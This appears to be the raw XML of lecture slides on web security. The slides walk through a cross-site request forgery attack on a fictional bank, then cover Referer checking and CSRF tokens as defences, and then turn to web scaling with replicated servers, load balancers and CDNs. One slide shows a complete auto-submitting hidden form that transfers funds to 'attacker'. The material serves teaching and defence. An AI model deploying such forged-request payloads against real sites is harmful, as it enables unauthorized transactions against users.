              <a:t>www.bofw.com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473" y="4839141"/>
            <a:ext cx="1005227" cy="10052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58952" y="5926895"/>
            <a:ext cx="25682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Origin: www.bofw.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>session=3#4fH8d%dA1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509639" y="4643941"/>
            <a:ext cx="1377448" cy="1507199"/>
            <a:chOff x="7769737" y="2349795"/>
            <a:chExt cx="1377448" cy="1507199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7769737" y="3456884"/>
              <a:ext cx="10565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evil.com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1268" y="2549659"/>
              <a:ext cx="893446" cy="89344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5303" y="2349795"/>
              <a:ext cx="641882" cy="641882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05" y="4719161"/>
            <a:ext cx="1245186" cy="124518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17555" y="1889368"/>
            <a:ext cx="2476716" cy="1746002"/>
            <a:chOff x="8632045" y="2688229"/>
            <a:chExt cx="2476716" cy="174600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0550" y="3094062"/>
              <a:ext cx="893446" cy="893446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8632045" y="4034121"/>
              <a:ext cx="12104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bofw.com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007906" y="2688229"/>
              <a:ext cx="21008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</a:rPr>
                <a:t>Bank of Washington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63190">
              <a:off x="9838137" y="3059225"/>
              <a:ext cx="440390" cy="236506"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6825743" y="1572177"/>
            <a:ext cx="5124517" cy="2751827"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27499"/>
              <a:gd name="adj2" fmla="val 6579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420623">
              <a:tabLst>
                <a:tab pos="317500" algn="l"/>
                <a:tab pos="647700" algn="l"/>
                <a:tab pos="977900" algn="l"/>
                <a:tab pos="1308100" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="1955800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2616200" algn="l"/>
                <a:tab pos="2933700" algn="l"/>
                <a:tab pos="3263900" algn="l"/>
                <a:tab pos="3594100" algn="l"/>
                <a:tab pos="3924300" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1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&lt;form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dirty="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action=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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"https://bofw.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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xfer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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lvl="0" defTabSz="420623">
              <a:tabLst>
                <a:tab pos="317500" algn="l"/>
                <a:tab pos="647700" algn="l"/>
                <a:tab pos="977900" algn="l"/>
                <a:tab pos="1308100" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="1955800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2616200" algn="l"/>
                <a:tab pos="2933700" algn="l"/>
                <a:tab pos="3263900" algn="l"/>
                <a:tab pos="3594100" algn="l"/>
                <a:tab pos="3924300" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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lang="en-US" b="1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&lt;input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dirty="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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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"hidden"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dirty="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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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"to“</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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lvl="0" defTabSz="420623">
              <a:tabLst>
                <a:tab pos="317500" algn="l"/>
                <a:tab pos="647700" algn="l"/>
                <a:tab pos="977900" algn="l"/>
                <a:tab pos="1308100" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="1955800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2616200" algn="l"/>
                <a:tab pos="2933700" algn="l"/>
                <a:tab pos="3263900" algn="l"/>
                <a:tab pos="3594100" algn="l"/>
                <a:tab pos="3924300" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="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value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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"attacker"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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lvl="0" defTabSz="420623">
              <a:tabLst>
                <a:tab pos="317500" algn="l"/>
                <a:tab pos="647700" algn="l"/>
                <a:tab pos="977900" algn="l"/>
                <a:tab pos="1308100" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="1955800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2616200" algn="l"/>
                <a:tab pos="2933700" algn="l"/>
                <a:tab pos="3263900" algn="l"/>
                <a:tab pos="3594100" algn="l"/>
                <a:tab pos="3924300" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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lang="en-US" b="1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&lt;input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dirty="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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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"hidden"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dirty="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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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"amount“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="420623">
              <a:tabLst>
                <a:tab pos="317500" algn="l"/>
                <a:tab pos="647700" algn="l"/>
                <a:tab pos="977900" algn="l"/>
                <a:tab pos="1308100" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="1955800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2616200" algn="l"/>
                <a:tab pos="2933700" algn="l"/>
                <a:tab pos="3263900" algn="l"/>
                <a:tab pos="3594100" algn="l"/>
                <a:tab pos="3924300" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="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value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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"1000000"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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lvl="0" defTabSz="420623">
              <a:tabLst>
                <a:tab pos="317500" algn="l"/>
                <a:tab pos="647700" algn="l"/>
                <a:tab pos="977900" algn="l"/>
                <a:tab pos="1308100" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="1955800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2616200" algn="l"/>
                <a:tab pos="2933700" algn="l"/>
                <a:tab pos="3263900" algn="l"/>
                <a:tab pos="3594100" algn="l"/>
                <a:tab pos="3924300" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1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&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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lvl="0" defTabSz="420623">
              <a:tabLst>
                <a:tab pos="317500" algn="l"/>
                <a:tab pos="647700" algn="l"/>
                <a:tab pos="977900" algn="l"/>
                <a:tab pos="1308100" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="1955800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2616200" algn="l"/>
                <a:tab pos="2933700" algn="l"/>
                <a:tab pos="3263900" algn="l"/>
                <a:tab pos="3594100" algn="l"/>
                <a:tab pos="3924300" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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.forms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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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].submit();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo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1413191" y="4991997"/>
            <a:ext cx="2545470" cy="405544"/>
            <a:chOff x="1413191" y="4991997"/>
            <a:chExt cx="2545470" cy="405544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1413191" y="5397541"/>
              <a:ext cx="254547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510028" y="4991997"/>
              <a:ext cx="22124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1) Send malicious link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105339" y="4717419"/>
            <a:ext cx="2341240" cy="396999"/>
            <a:chOff x="5105339" y="4717419"/>
            <a:chExt cx="2341240" cy="396999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Arrow Connector 39"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5105339" y="5114417"/>
              <a:ext cx="2341240" cy="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5878252" y="4717419"/>
              <a:ext cx="7954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2) GET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063700" y="5407703"/>
            <a:ext cx="2382880" cy="374818"/>
            <a:chOff x="5063700" y="5539083"/>
            <a:chExt cx="2382880" cy="374818"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="41" name="Straight Arrow Connector 40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5063700" y="5539083"/>
              <a:ext cx="2382880" cy="1343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268824" y="5544569"/>
              <a:ext cx="20142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3) HTTP/1.1 200 OK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101852" y="3120666"/>
            <a:ext cx="2265349" cy="1688143"/>
            <a:chOff x="2101852" y="3120666"/>
            <a:chExt cx="2265349" cy="1688143"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2128015" y="3120666"/>
              <a:ext cx="2239186" cy="168814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 rot="2218948">
              <a:off x="2101852" y="4014345"/>
              <a:ext cx="22016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4) POST, session=3#...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286524" y="2889202"/>
            <a:ext cx="2476934" cy="1800033"/>
            <a:chOff x="2286524" y="2889202"/>
            <a:chExt cx="2476934" cy="1800033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2286524" y="2889202"/>
              <a:ext cx="2447913" cy="180003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 rot="2196168">
              <a:off x="2431729" y="3417097"/>
              <a:ext cx="23317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5) HTTP/1.1 302 Found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310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Mitigating CSRF Attacks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main types of defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leverages the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> HTTP header, which is automatically added to all requests by the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imperfect solution, may lead to false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random tokens inserted into all forms by the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> responses must include the corresponding random token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8151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62" y="266953"/>
            <a:ext cx="6674168" cy="6309266"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="548640"/>
            <a:ext cx="13612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1992:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18662746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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”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78666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HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sent automatically by the browser to indicate the origin of a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: if you click a link from Google Search…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer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https://google.com/search?q=whatever</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three possibilities in the previous CSRF example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: https://www.bofw.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: http://evil.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to mitigate CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strict: only accept POST if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is present </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> expected value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lenient: only accept POST if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is absent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> expected value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33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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Privacy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886195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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header can leak information from your browser to a website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imagine seeing an access log entry for a celebrity's Wikipedia entry where...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://int.cia.gov/projects/hitlist.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common sources of blocking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP proxy at network perimeter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTPS → HTTP transitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User blocking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to mitigate CSRF may lead to false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Angry users, lost revenue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137206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CSRF Tokens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2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&lt;form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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200" dirty="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action=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1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xfer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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2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// ...</a:t>
            </a:r>
          </a:p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2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lang="en-US" sz="22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&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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200" dirty="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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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"hidden“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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200" dirty="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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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"CSRF_TOKEN“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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200" dirty="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value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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"Ko7bgbjYr2+nqO7J7zIKbQ=="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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2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&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> responses to include a secret value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Unguessability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> implies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unforgeability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP prevents attacker from downloading the target form using code in your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker can't feasibly predict correct value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Con: requires rewriting app in most cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pro: Many web frameworks include CSRF token modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy could also be used to insert and check tokens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85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CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wrapup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Mitigation requires a one-step, side-effecting action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks are blind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>important_action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF is the dual of XSS is some ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In XSS, client trust in the server is violated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In CSRF, server trust in the client is violated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A classic example of a confused deputy attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The app is tricked into doing something it shouldn't do, even though it possesses the authority to do so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66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 Up Web Content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Load balancers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Content Delivery/Distribution Networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3820943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Serving Web Content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99409"/>
            <a:ext cx="4940559" cy="534468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the beginning…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…there was a single server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Probably located in a closet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And it probably served blinking text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Issues with this model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site reliability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unplugging cable, hardware failure, natural disaster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scalability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flash crowds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="image3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0" y="1586204"/>
            <a:ext cx="5839894" cy="48270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3417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Replicated Web Servers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7355" y="1478569"/>
            <a:ext cx="7489371" cy="5344680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Better scalability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Better reliability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How do you decide which server to use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How do you direct clients to different servers?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to do synchronize state among servers?</a:t>
            </a:r>
          </a:p>
          <a:p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1344369" y="1642116"/>
            <a:ext cx="1905119" cy="136980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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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24532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0" y="4024532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080" y="4024532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020" y="4024532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Elbow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="1"/>
            <a:endCxn id="5" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1212281" y="2939884"/>
            <a:ext cx="1014068" cy="1155229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4" idx="1"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2353690" y="2953702"/>
            <a:ext cx="1014068" cy="1127591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4" idx="1"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
